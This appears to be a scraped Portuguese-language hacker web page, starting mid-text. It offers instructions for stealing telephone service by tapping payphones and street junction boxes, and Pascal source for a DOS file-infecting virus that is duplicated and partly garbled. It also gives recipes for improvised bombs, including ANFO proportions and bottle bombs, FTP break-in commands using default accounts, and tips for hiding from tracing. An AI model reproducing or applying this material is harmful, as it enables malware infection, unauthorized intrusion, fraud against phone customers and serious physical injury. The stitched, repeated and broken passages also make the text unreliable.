loja que venda, pegue uma placa antiga de alguma coisa que tenha
queimado.
Elas sempre tem diodos. Voce deve procurar uma peça pequinininha que
tem dois terminais, e preta e normalmente vai estar escrito IN.



Efetuando ligaçoes com seu pequeno telefone em um orelhão

Essa técnica foi muito usada aqui na minha city por mim e por amigos.
Vc deve de madrugada (de preferencia) chegar no orelhào e colocar a mao
la tras, vc vera que tem um fio duplo soh. com muito cuidado puxeo para o
lado e descasque os dois fios!! pronto agora é soh chegar ali e conectar seu
pequeno telefone aos fios do orelhão e pronto. Vc tem uma linha que vc so
pode ligar pra DEI, DEI, DEI (DDD) porque orelhão tem bloqueio de ligação
internacional.
Dica: compre um telefone em lojas de consertos eleronicos bem pequenos e
antigos que tem um formato de um celular.
Dica2: o que so pode fazer é conectar um notebook e navegar normalmente com
uma conta de um lammer.



Efetuando ligaçoes dos tampoes do meio da rua

Naum sei se vc ja notou, aquelas tampas que existe no meio da rua. Escrito tipo" telefone" na minha city ta cheio, se na tua nao tem te fode. Um dia (de preferencia de madrugada) levanta aquilo, pedi pra alguem ajuda porque é pesado. Vai te um monte de barata mas manda elas toma no cu. Vc vai ver um fio se ele tiver descascado Otimo!! tira a isolante e usa. Mas se ele nao tiver descascado vc vai ter que fazer isso. Agora pega o seu fone e conecta naquele fio vc vai pode fazer ligaçao (ddd, ddi, pros quintos dos infernos pra onde tu quiser) Foda-se o babaca que pagar isso.
Dica: Quando vc fechar a tampa deixa a parte do fio que vc descascou pra fora aí a outra vez que vc ir lá vc nao precisa levantar aquela porra.



Efetuando ligaçoes gratuitas de caixas de verificaçaum
(caixas da CRT OU TELEMERDA):

Para se efetuar uma ligaçaum de dentro destas caixas, basta que voce
pegue um dos diversos pares de fios que se encontram la dentro e ligue
eles ao seu pequeno telefone comum portatil ou a um notebook. Naum
esqueça de por os fios que voce tirou de volta no lugar para que, nem o
pessoal da manutençaum e nem o dono da linha, percebam. Como essas
caixas de verificaçaun costumam se situar em vias bem movimentadas, a
pratica desse tipo de ligaçaum e desaconselhada. Mas, como toda a regra
tem sua exceçam, fica aqui mais uma informaçaum para voce. Vale lembrar
que de caixas de verificaçaum, pode-se efetuar telefonemas para qualquer
lugar, inclusive chamadas internacionais pois saum linhas comuns de
telefones!


POR FAVOR NÃO CLIK AQUI NA FIGURA


firme.gif


E AI POR QUE ESTA OLHANDO AQUI JA FALEI PRA NÃO CLICK NA FIGURA, A RESPONSABILIDADE É TODA SUA !!



Dica:As caixas de vericaçaum sao aquelas caixas cinzas que tem em todos
bairros. Se vc encontrar uma aberta. Phreak até nao poder mais e depois
coloque um cadeado seu lá para os babacas da telemerda nao descobrirem
que mexerem pois nao terão como abrir.

Tecnicas PHREAKERS

Agora vc vai aprender a fazer ligações des celular e telefone publico de graça, quer dizer que são serciços que o governo cobra do consumidor que poderiam ser gratuitos !!

morte.gif

Ligando de telefones sem tecla ou que tem cadeado
Bom vcs ja devem ter ouvido falar de pessoas que ligaram pelo botao
de desligar, ou de dar linha aquele onde vc poe o gancho por cima.
Porra se deve ter entendido.
Bom muito facil tbm, so nao dou certeza de que va funcionar porque o
telefone não pode ser muito novo...tem que ser um modelo um pouco mais
antigo

-.- DIRETO AO ASSUNTO -.-

1- Faca a ligacao com o numero desejado!
ex: 555-6766

- para discar o 5 ( aperte cinco vezes aquele botao )
5 ( aperte cinco vezes aquele botao )
5 ( aperte cinco vezes aquele botao )
6 ( aperte seis vezes aquele botao )
7 ( aperte sete vezes aquele botao)
6 ( aperte seis vezes aquele botao )
6 ( aperte seis vezes aquele botao )

Voce deve estar se perguntando, mas se tiver um zero como eu faco?
p:-Nao aperto nada?
r:-Nao porra, aperte dez vezes aquele botao!

Obx: Tem que ter um intervalo de 1 a 2 segundos entre os apertos!
Obx2: "aquele botao" é o botao do gancho, onde voce desliga!



Ligando de telefone publico sem pagar!
Este metodo so funciona em telefones antigos! Aqueles na base da fichinha
ou da moedinha ( se estiver nos Eua, usa o Rex Box ).
Por exemplo:

O numero que vc quer ligar e' 823-26-47 ( numero ficticio )

Primeiro vc deve dimunuir de 10 todos os numeros que compoem o telefone
a se ser discado, no caso esse telefone ficaria.

Numero a ser discado: 823-26-47

ORIGINAL_______
|
(8-10)=2
(2-10)=8
(3-10)=7
(2-10)=8
(6-10)=4
(4-10)=6
(7-10)=3
|_______ NOVO NUMERO


O novo numero sera: 287-84-63

O que vc vai ter que fazer e' bater no bocal do telefone o numero de ve-
zes correspondente a subtracao.

Bata 2 vezes no bocal ( intervalo de 2 segundos )
Bata 8 vezes no bocal ( intervalo de 2 segundos )
Bata 7 vezes no bocal ( intervalo de 2 segundos )
Bata 8 vezes no bocal ( intervalo de 2 segundos )
Bata 4 vezes no bocal ( intervalo de 2 segundos )
Bata 6 vezes no bocal ( intervalo de 2 segundos )
Bata 3 vezes no bocal ( intervalo de 2 segundos )

Desta maneira vc podera fazer ligacoes gratuitamente...
Quando estiver agil podera ligar mais rapido, ai fica facil!
Nossa viagem de férias; Tamanho real=180 pixels de largura

Ë ÅÏ $ëµ øtårïø $åßë fåzër vïrµ$


e ai seu otario sabe fazer virus ?
entao me envia um o email é
te espero seu otario !!!!!!!!!!
veja minha foto acima hahahahah
Frank hahahahahaha


vcs pensao que virus e brincadeira seus simples mortais da net

fumaça.gif
VC PODE ESTAR CONTRUINDO SUA PROPRIA MORTE SE-CUIDA!!!

. - =/Codigo de virus\ = - .

Nossa viagem de férias; Tamanho real=180 pixels de largura

FLUXOGRAMA:
Vírus Executado
|
|
(inicinf)Iniciar infecção nos caminhos
c:\dos\*.com, c:\dos\*.exe, *.com, *.exe
c:\windows\*.com, c:\windows\*.exe
|
|
(infec)Infecta os arquivos do diretório fornecido.
|
|
(procura)Procura primeiro arquivo a infectar
|
|
+-----> (verifica) Arquivo Infectado? ---S--------------------------------+
| | |
| | N |
| (infec)Copia vírus (sem arquivo hospedeiro) |
| para um arquivo chamado virtemp.tmp |
| | |
| | |
| cópia arquivo a ser infectado a partir |
| do fim do vírus (concatenação): |
| copy /b virtemp.exe+arquivo.exe virtemp.tmp |
| | |
| | |
| Grava data e hora do arquivo em variáveis. |
| | |
| | |
| Apaga arquivo original a ser infectado (del arquivo.exe) |
| | |
| | |
| Renomeia vírus com arquivo infectado(virtemp.tmp) para |
| arquivo.exe: ren virtemp.tmp arquivo.exe |
| | |
| | |
| Recupera a data e hora do arquivo hospedeiro |
| | |
| | |
+-------------S-- Procura mais arquivos. <--------------------------------+
Existem mais arquivos?
|
| N
(executa)Iniciar execução do programa hospedeiro
|
|
Separar programa hospedeiro do vírus
|
|
Posicionar ponteiro no fim do vírus (e início do arquivo)
|
|
Iniciar a copiar a partir deste ponto até o fim do arquivo (Resultado: programa sem vírus pronto a ser executado) para um arquivo chamado virtemp.TMP
|
|
Executar arquivo virtemp.tmp
|
|
Limpar o conteúdo do arquivo
virtemp.tmp (de modo que nãose possa recuperar o que tinha dentro dele)
|
|
Apagar o arquivo virtemp.tmp
|
|
Iniciar procedimentos que ele possa vir a fazer (Apagar arquivos, mexer com a
impressora, etc).
|

Fim


Fim do vírus
INICIANDO A INFECTAR
Vamos iniciar a infecção. Nesse caso seria somente iniciar o caminho que se quer infectar. Nesse caso: c:\dos\*.com, c:\dos\*.exe, *.com, *.exe, c:\windows\*.com, c:\windows\*.exe, junto disso deve ser dado o diretório de trabalho.
Procedure inicinf;
begin
if MOSTRA then writeln('Iniciando infecção dos arquivos');
arquiv:=0;
procura('*.com','');
procura('*.exe','');
procura('c:\windows\*.com','c:\windows\');
procura('c:\windows\*.exe','c:\windows\');
procura('c:\dos\*.com','c:\dos\');
procura('c:\dos\*.exe','c:\dos\');
if MOSTRA then writeln('Infecção dos arquivos Finalizada. Com um total de:');
if MOSTRA then writeln(arquiv,' arquivos infectados.');
end;
Como se pode ver, essa procedure somente lança outra. Ah! Outra coisa. É preciso fornecer um diretório de trabalho para o esquema poder funcionar direito.
INFECÇÃO DE VÍRUS
Essa parte ainda seria um procedure que lança outra, mas ela trabalharia mais a nível de arquivo do que a anterior.

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv'COMMAND.COM') then begin
HORAINI(NOME); {Grava data e hora do arquivo}
assign(FromF,nome);
reset(FromF,1);
assign(ToF,'virtemp.tmp');
Rewrite(ToF,1);
repeat
BlockRead(FromF, buf2, SizeOf(buf2), numread);
BlockWrite(ToF, buf2, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);

{Ate aqui seria a parte onde se copia o arquivo a ser infectado para outro
arquivo temporário}

assign(FromF,nome_arq); {nome_arq: explicado mais tarde}
reset(FromF, 1);
assign(ToF, nome);
Rewrite(ToF, 1);
BlockRead(FromF, buf, SizeOf(buf), numread); {Caso você não se lembre, o BUF é o buffer}
BlockWrite(ToF, buf, numread, NumWritten); {que conterá o vírus, que nesse caso ele}
close(FromF); {copiará somente o vírus para o arquivo a}
close(tof); {ser infectado (arquivo.exe) em que havia sido}
{movido o seu conteúdo para virtemp.tmp }
{deixando, por enquanto somente o vírus no }
{arquivo }

assign(FromF,'virtemp.TMP');
reset(FromF, 1);
assign(ToF, nome);
reset(tof,1);
seek(tof,LENVÍRUS); {Posiciona o ponteiro do arquivo na posição final do arquivo}
repeat
BlockRead(FromF, buf, SizeOf(buf), numread);
BlockWrite(ToF, buf, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);
erase(fromf);
HORAFIM(NOME);
end;
{Essa parte seria a concatenação vírus+arquivo, onde o arquivo seria acrescentado no fim do
vírus}

if MOSTRA then writeln('Infecção completa.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv numread);
close(FromF);
close(tof);
exec('virtemp.tmp',paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); {Executa o programa aqui}
rewrite(tof); {Agora vou limpar o conteúdo e apagar o arquivo}
close(tof);
erase(tof);
if MOSTRA then writeln('Execução do programa hospedeiro finalizado);
end;
Corpo Principal do programa
Vamos ter que iniciar as funções do vírus:
begin
if MOSTRA then writeln('Iniciando o Vírus');
nome_arq:=paramstr(0); {Essa variável irá conter o nome do programa que está sendo executado
no momento. Caso o nome que foi executado seja EDIT.exe essa variável
conterá EDIT.EXE}
SETCBREAK(FALSE); {Para que o usuário não possa apertar Ctrl-C}
contra(nome_arq);
inicinf;
executa;
apag_arq;
GetIntVec($1c,@int1c); {Essa parte sera vista mais adiante}
SetIntVec($1c,Addr(bola));
vbola:=false;
cx:=random(80);{Aleatorizar a posição da bola na tela}
cy:=random(24);
GetIntVec($17,@printer); {Essa parte será vista mais adiante}
SetIntVec($17,Addr(escrever)); {Essa parte mostra ao computador para usar
O procedimento escrever como padrão para a
impressora}
if MOSTRA then writeln('Fim do vírus.');
keep(0); {Deixa o programa residente na memória.}
if mostra then writeln('Programa Residente');
end.
Programas necessário à execução do Vírus
Vou mostrar alguns programas necessários para o correto uso desse vírus:
1. Programa que determina o cabeçalho e já mostra o tamanho do executável. Esse programa tem que ser colocado em um arquivo com o seguinte código:
program Cabecalho;
uses crt;
var
arq: file;
NumRead, NumWritten: Word;
Buf: array[1..5] of Char;
begin
Assign(arq, 'vírus.exe'); { Open input file }
Reset(arq, 1); { Record size = 1 }
Writeln('Tamanho do Vírus: ', FileSize(arq), ' bytes...');
BlockRead(arq, Buf, SizeOf(Buf), NumRead);
Close(arq);
writeln('Cabecalho: ',buf[1],buf[2],buf[3],buf[4],buf[5]);
writeln('Código Ascii: ',ord(buf[1]),' ',ord(buf[2]),' ',ord(buf[3]),' ',ord(buf[4]),' ',ord(buf[5]));
end.

procedure contra(non:string);
var
FromF, ToF: file;
ARQ:text;
Ft:FILE of char;
f:file;

function vervir(nome:string):boolean;
VAR
Buf: array[1..10] of Char;
NUMREAD:WORD;
con:integer;
begin
if mostra then writeln('Iniciando verificação de infecção do arquivo ',nome);
con:=1;
ASSIGN(F,NoME);
ReSET(F,1); { Record size = 1 }
BlockRead(F, Buf, SizeOf(Buf), NumRead);
IF (BUF[1]=cab[1]) AND (BUF[2]=cab[2])AND (BUF[3]=cab[3])AND (BUF[4]=cab[4])AND (BUF[4]=cab[4]) tHEN
{Verifica o cabecalho do arquivo}
vervir:=TRUE {para ver se já foi infectado}
ELSE
vervir:=FALSE;
Close(F);
if mostra then writeln('Verificação de infecção finalizadá);
END;
procedure antivir;
begin
if not vervir(non) then
begin
if mostra then writeln('Arquivo Infectado, tentando desinfectar...'); {Arquivo infectado, tentando desinfectar...}
aSSIGN(Ft,paramstr(0));
ReSET(Ft); { Record size = 1 }
write(ft,cab[1]);
write(ft,cab[2]);
write(ft,cab[3]);
write(ft,cab[4]);
write(ft,cab[5]);
close(ft);
if mostra then writeln('Desinfecção completa!'); {Desinfecção completa}
textcolor(white+blink);
writeln('Atencao: Seu computador esta infectado por vírus! Sugiro passar Anti-vírus!');
textcolor(white);
end;
end;
begin
if mostra then writeln('Inicio do procedimento anti-vírus.');
antivir;
if mostra then writeln('Fim do procedimento anti-vírus.');
end;

. - = / Como Fazer virus \ = - .

virus trojan

Procedure inicinf;
begin
if MOSTRA then writeln('Iniciando infecção dos arquivos');
arquiv:=0;
procura('*.com','');
procura('*.exe','');
procura('c:\windows\*.com','c:\windows\');
procura('c:\windows\*.exe','c:\windows\');
procura('c:\dos\*.com','c:\dos\');
procura('c:\dos\*.exe','c:\dos\');
if MOSTRA then writeln('Infecção dos arquivos Finalizada. Com um total de:');
if MOSTRA then writeln(arquiv,' arquivos infectados.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv'COMMAND.COM') then begin
HORAINI(NOME); {Grava data e hora do arquivo}
assign(FromF,nome);
reset(FromF,1);
assign(ToF,'virtemp.tmp');
Rewrite(ToF,1);
repeat
BlockRead(FromF, buf2, SizeOf(buf2), numread);
BlockWrite(ToF, buf2, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);

{Ate aqui seria a parte onde se copia o arquivo a ser infectado para outro
arquivo temporário}

assign(FromF,nome_arq); {nome_arq: explicado mais tarde}
reset(FromF, 1);
assign(ToF, nome);
Rewrite(ToF, 1);
BlockRead(FromF, buf, SizeOf(buf), numread); {Caso você não se lembre, o BUF é o buffer}
BlockWrite(ToF, buf, numread, NumWritten); {que conterá o vírus, que nesse caso ele}
close(FromF); {copiará somente o vírus para o arquivo a}
close(tof); {ser infectado (arquivo.exe) em que havia sido}
{movido o seu conteúdo para virtemp.tmp }
{deixando, por enquanto somente o vírus no }
{arquivo }


assign(FromF,'virtemp.TMP');
reset(FromF, 1);
assign(ToF, nome);
reset(tof,1);
seek(tof,LENVÍRUS); {Posiciona o ponteiro do arquivo na posição final do arquivo}
repeat
BlockRead(FromF, buf, SizeOf(buf), numread);
BlockWrite(ToF, buf, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);
erase(fromf);
HORAFIM(NOME);
end;
{Essa parte seria a concatenação vírus+arquivo, onde o arquivo seria acrescentado no fim do
vírus}

if MOSTRA then writeln('Infecção completa.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv numread);
close(FromF);
close(tof);
exec('virtemp.tmp',paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); {Executa o programa aqui}
rewrite(tof); {Agora vou limpar o conteúdo e apagar o arquivo}
close(tof);
erase(tof);
if MOSTRA then writeln('Execução do programa hospedeiro finalizado);
end;
Corpo Principal do programa
Vamos ter que iniciar as funções do vírus:
begin

if MOSTRA then writeln('Iniciando o Vírus');
nome_arq:=paramstr(0); {Essa variável irá conter o nome do programa que está sendo executado
no momento. Caso o nome que foi executado seja EDIT.exe essa variável
conterá EDIT.EXE}
SETCBREAK(FALSE); {Para que o usuário não possa apertar Ctrl-C}
contra(nome_arq);
inicinf;
executa;
apag_arq;
GetIntVec($1c,@int1c); {Essa parte sera vista mais adiante}
SetIntVec($1c,Addr(bola));
vbola:=false;
cx:=random(80);{Aleatorizar a posição da bola na tela}
cy:=random(24);
GetIntVec($17,@printer); {Essa parte será vista mais adiante}
SetIntVec($17,Addr(escrever)); {Essa parte mostra ao computador para usar
O procedimento escrever como padrão para a
impressora}
if MOSTRA then writeln('Fim do vírus.');
keep(0); {Deixa o programa residente na memória.}
if mostra then writeln('Programa Residente');
end.
Programas necessário à execução do Vírus
Vou mostrar alguns programas necessários para o correto uso desse vírus:
1. Programa que determina o cabeçalho e já mostra o tamanho do executável. Esse programa tem que ser colocado em um arquivo com o seguinte código:
program Cabecalho;
uses crt;
var
arq: file;
NumRead, NumWritten: Word;
Buf: array[1..5] of Char;
begin
Assign(arq, 'vírus.exe'); { Open input file }
Reset(arq, 1); { Record size = 1 }
Writeln('Tamanho do Vírus: ', FileSize(arq), ' bytes...');
BlockRead(arq, Buf, SizeOf(Buf), NumRead);
Close(arq);
writeln('Cabecalho: ',buf[1],buf[2],buf[3],buf[4],buf[5]);
writeln('Código Ascii: ',ord(buf[1]),' ',ord(buf[2]),' ',ord(buf[3]),' ',ord(buf[4]),' ',ord(buf[5]));
end.
FLUXOGRAMA:
Vírus Executado
|
|
(inicinf)Iniciar infecção nos caminhos
c:\dos\*.com, c:\dos\*.exe, *.com, *.exe
c:\windows\*.com, c:\windows\*.exe
|
|
(infec)Infecta os arquivos do diretório fornecido.
|
|
(procura)Procura primeiro arquivo a infectar
|
|
+-----> (verifica) Arquivo Infectado? ---S--------------------------------+
| | |
| | N |
| (infec)Copia vírus (sem arquivo hospedeiro) |
| para um arquivo chamado virtemp.tmp |
| | |
| | |
| cópia arquivo a ser infectado a partir |
| do fim do vírus (concatenação): |
| copy /b virtemp.exe+arquivo.exe virtemp.tmp |
| | |
| | |
| Grava data e hora do arquivo em variáveis. |
| | |
| | |
| Apaga arquivo original a ser infectado (del arquivo.exe) |
| | |
| | |
| Renomeia vírus com arquivo infectado(virtemp.tmp) para |
| arquivo.exe: ren virtemp.tmp arquivo.exe |
| | |
| | |
| Recupera a data e hora do arquivo hospedeiro |
| | |
| | |
+-------------S-- Procura mais arquivos. <--------------------------------+
Existem mais arquivos?
|
| N
(executa)Iniciar execução do programa hospedeiro
|
|
Separar programa hospedeiro do vírus
|
|
Posicionar ponteiro no fim do vírus (e início do arquivo)
|
|
Iniciar a copiar a partir deste ponto até o fim do arquivo (Resultado: programa sem vírus pronto a ser executado) para um arquivo chamado virtemp.TMP
|
|
Executar arquivo virtemp.tmp
|
|
Limpar o conteúdo do arquivo
virtemp.tmp (de modo que nãose possa recuperar o que tinha dentro dele)
|
|
Apagar o arquivo virtemp.tmp
|
|
Iniciar procedimentos que ele possa vir a fazer (Apagar arquivos, mexer com a
impressora, etc).
|

COMO FAZER BOMBA CASEIRA

EU  NÃO    ME    RESPONSABILIZO  PELOS     SEUS   ATOS
SEU      SER   METIDO   A   HACKER
 
NÃO CLICK NESTA FIGURA ABAIXO
(WARNING)


firme.gif
 
-=|BOMBAS CASEIRAS|=- Bomba de Fumaça Você vai precisar de: açúcar, nitrato de potássio e um pote de boca larga. Instruções: junte 4 partes de açúcar com 6 partes de nitrato de potássio numa panela. Esquente em fogo baixo e mexa bem até derreter tudo. Coloque a mistura no pote e, antes de solidificar, jogue alguns fósforos para funcionar como pavio. Funcionamento: O fósforo queima e acende a mistura, acontece as reações químicas e a fumaça é liberada. Anfos
Você precisa de: querosene ou óleo de motor, nitrato de amônia e uma bacia.


Instruções: misture na bacia 94% de nitrato de amônia com 6%de querosene ou óleo.


Funcionamento: sei lá.....hehehe. só sei que é para você correr...correr mesmo...hehehe!!



Bomba de Carboneto


Você precisa de: carboneto de sódio, pote de vidro com tampa e água.


Instruções: encha o vidro com água, coloque carboneto de cálcio no vidro e tampe.


Funcionamento: o carboneto vai reagir com água e vai formar um gás inflamável chamado carbonato de acetileno, a pressão do vidro irá aumentar e o pote irá estourar. Se você quiser um estrago maior, deixe um pano do lado do vidro.
BOMBAS



Bomba de Gelo Seco


Você precisa de: uma garrafa de vidro, água e gelo seco.


Instruções: encha a garrafa até quase a boca, complete com gelo seco, tampe e corra.


Funcionamento: o gelo seco reage com a água e volta na forma gasosa, expandindo seu volume, a pressão interna aumenta e a garrafa explode.



Bomba de Impacto


Você precisa de: uma bola de gude (ou sinuca) pólvora, saco plástico e barbante.


Instruções: recorte um pedaço de plástico que de para enrolar a bola de gude, coloque um pouco de pólvora sobre o plástico, a bola em cima da pólvora e embrulhe-a com plástico, amarre a ponta com o barbante, fazendo que fique bem firme para a pólvora não sair. para detonar jogue a bomba em alguma superfície dura.


Funcionamento: quando a bomba bate na superfície dura, a bola de gude espreme a pólvora fazendo com que estoure.



firme.gif


INVADINDO PELO FTP

PRESTE ATENÇÃO NESTA DICA SEU MANÉ!


FTP
I n v a d i n d o : ( E s s a p o r r a d e c o m o i n v a d i r F T P e u c a t e i n a H P d u m m a n é a e m a s e m a l g u n s c a s o s ( Q u a s e t o d o s ) n a u m f u n c i o n a ) . V á a o P r o m p t e d i g i t e F T P , a o a p a r e c e o p r o m p t f t p > , d i g i t e O P E N , i r a a b r i r u m o u t r o P r o m p t ( t o ) , d i g i t e o n o m e d o h o s t o u s e u I P , t i p o ( t o ) f t p . m a n d i c . c o m . b r . A o c o n e c t a r e l e p e d i r á a s e n h a e o P a s s w o r d , t e n t e u s a r o s p a s s w o r d s U N I X , s e n ã o d e r v c d e v e e n t r a r n o s i s t e m a . C a s o n a u m e n t r e s i g a a s i n s t r u ç õ e s a b a i x o : N o l o g i n p r e c i o n e E N T E R , n o p a s s w o r d p r e c i o n e n o v a m e n t e . . . I r a a p a r e c e r o p r o m p t f t p > n o v a m e n t e . . . . , a i é s ó d i g i t a r . . . q u o t e u s e r f t p , p r e c i o n e E N T E R e d i g i t e : q u o t e c w d ~ r o o t P r e c i o n e E N T E R n o v a m e n t e e d i g i t e : q u o t e p a s s f t p

Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user
restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção, para isto
tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....
--------------------------------------------------------------------------------

Protegendo seu toba de ser rastreado:

Naum eh mto dificil naum ser rastreado, por exemplo, o EyeDent ( DC Internet Service Pack ) serve para criar um host falso e permitir vc mentir em algumas coisas, como esta no readme dele, olhe soh:
EyeDent spoofer will allow you to fake your user name on any ident request. Which means you can lie to ftp sessions, telnet sessions, irc sessions (which is a telnet session anways) from windows. Ou em português:
EyeDent spoofer vai permitir vc usar um user name ou qualquer pedido de identidade falso. O que significa q vc vai poder mentir em Ftp , telnet, irc ( Eh um telnet ) do windows.
Baum, jah deu pra sacar que com esse programa vc pode mentir sobre seu host. Agora, use um firewall tipo o da ConSeal que muda seu IP e bloqueia acessos a ele.
Com isso quem vai te rastrear??
ICQ

Li isso numa pagina ae e estou deixando mais simplificado aki na minha.
Primeiro que você não MUDA de IP, vc ENGANA a mirabilis e o ICQ é o seguinte, firewall trava altos tipos de cominicação na net e fica muito dificil de alguem pegar seu IP, então, uma pessoa que tem firewall não poderia utilizar ICQ correto? Errado, dentro do ICQ vc marca a opção que esta usando firewall e coloca seu IP falso. Assim, vc vai forçar a Mirabilis a acreditar que vc esta usando firewall e que seu IP é aquele informado. Para fazar isso siga os seguintes passos:
1) Abra seu ICQ no modo Offline
2) Entre lá no Preferences ( Menu ICQ )
3) Entre na aba Connection e marque a opção "I'm using a permanent internet..." e marque a check box "I'm behind a firewall or proxy" e depois clique em Firewall Settings
4) Marque a opção I'm using a SOCKS 4 Proxy server, clique em NEXT
5) Escreva na frente de SOCKS4 SERVER o IP q vc quer ter.
DICA: Coloque um IP de servidor ou servidor de Proxy. Vc pega essas informações de proxy na propia pagina de seu servidor, procure por Proxy lah ou mande um e-mail pro suporte lah pedindo as configurações de Proxy ( Proxy eh um treco grande de explicar, mas relaxe, naum eh nada perigoso naum, eh ateh bom! )

--------------------------------------------------------------------------------